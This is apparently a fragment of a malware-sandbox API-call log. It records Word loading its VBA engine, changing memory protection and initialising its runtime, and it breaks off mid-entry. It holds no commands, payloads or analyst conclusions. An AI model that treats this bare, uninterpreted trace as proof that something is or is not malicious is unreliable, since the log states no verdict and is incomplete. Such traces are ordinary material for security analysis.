FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0104.624] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.625] GetCurrentProcess () returned 0xffffffff [0104.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0104.625] GetCurrentProcess () returned 0xffffffff [0104.625] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0104.625] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.625] GetCurrentProcess () returned 0xffffffff [0104.626] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0104.626] GetCurrentProcess () returned 0xffffffff [0104.626] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0104.626] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.626] GetCurrentProcess () returned 0xffffffff [0104.626] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0104.626] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.626] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0104.626] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0104.627] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.627] GetProcAddress (hModule=0x693e0000, lpProcName=0x217) returned 0x693e741e [0104.628] GetAsyncKeyState (vKey=3) returned 0 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.628] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0104.629] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0x9, wMilliseconds=0x8c)) [0104.629] VarAdd (in: pvarLeft=0x197ef0, pvarRight=0x197ee0, pvarResult=0x197ed0 | out: pvarResult=0x197ed0) returned 0x0 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.629] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0104.629] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0x9, wMilliseconds=0x8c)) [0104.885] NtdllDefWindowProc_A (hWnd=0x3027e, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0107.781] NtdllDefWindowProc_A (hWnd=0x3027e, Msg=0xc206, wParam=0x50, lParam=0x0) returned 0x0 [0107.898] NtdllDefWindowProc_A (hWnd=0x3027e, Msg=0xc206, wParam=0x50, lParam=0x0) returned 0x0 [0108.878] NtdllDefWindowProc_A (hWnd=0x3027e, Msg=0x1c, wParam=0x0, lParam=0x1054) returned 0x0 [0110.001] GetModuleHandleW (lpModuleName=0x0) returned 0x1170000 [0110.001] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0110.001] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0110.002] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0110.002] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0110.003] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0110.003] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0110.004] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0110.004] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0110.005] GetProcessHeap () returned 0x630000 [0110.005] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0110.006] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0110.006] GetLastError () returned 0x3f0 [0110.006] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0110.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x364) returned 0xf4d70e8 [0110.007] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0110.007] SetLastError (dwErrCode=0x3f0) [0110.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xc00) returned 0xccf4b30 [0110.009] GetStartupInfoW (in: lpStartupInfo=0x19761c | out: lpStartupInfo=0x19761c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x121496a0, hStdOutput=0xa95aba3e, hStdError=0xfffffffe)) [0110.009] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0110.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0110.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.009] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0110.009] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0110.009] GetLastError () returned 0x3f0 [0110.009] SetLastError (dwErrCode=0x3f0) [0110.009] GetLastError () returned 0x3f0 [0110.009] SetLastError (dwErrCode=0x3f0) [0110.009] GetACP () returned 0x4e4 [0110.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x220) returned 0xcc55540 [0110.009] IsValidCodePage (CodePage=0x4e4) returned 1 [0110.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19764c | out: lpCPInfo=0x19764c) returned 1 [0110.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x196f14 | out: lpCPInfo=0x196f14) returned 1 [0110.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196cb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.009] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x196f28 | out: lpCharType=0x196f28) returned 1 [0110.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.010] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0110.010] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x769b95f0 [0110.010] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.010] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0110.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x197428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0110.010] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0110.011] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.011] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0110.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x197328, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0110.011] RtlInitializeSListHead (in: ListHead=0x121aa0e8 | out: ListHead=0x121aa0e8) [0110.011] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0110.011] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0110.012] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0110.012] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0110.013] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0110.013] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0110.013] GetProcAddress (hModule=0x76720000, lpProcName="InitOnceExecuteOnce") returned 0x769cc2d0 [0110.014] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0110.014] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreW") returned 0x76746710 [0110.015] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0110.015] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0110.016] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0110.017] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0110.017] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0110.018] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0110.019] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0110.019] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0110.020] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0110.021] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0110.022] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0110.022] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0110.023] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0110.023] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0110.024] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleEx") returned 0x76760ea0 [0110.025] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandle") returned 0x76746c30 [0110.025] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x76746cf0 [0110.026] GetProcAddress (hModule=0x76720000, lpProcName="InitializeConditionVariable") returned 0x771f6710 [0110.026] GetProcAddress (hModule=0x76720000, lpProcName="WakeConditionVariable") returned 0x7723c720 [0110.027] GetProcAddress (hModule=0x76720000, lpProcName="WakeAllConditionVariable") returned 0x77238d70 [0110.028] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableCS") returned 0x76a47f60 [0110.028] GetProcAddress (hModule=0x76720000, lpProcName="InitializeSRWLock") returned 0x771f6710 [0110.029] GetProcAddress 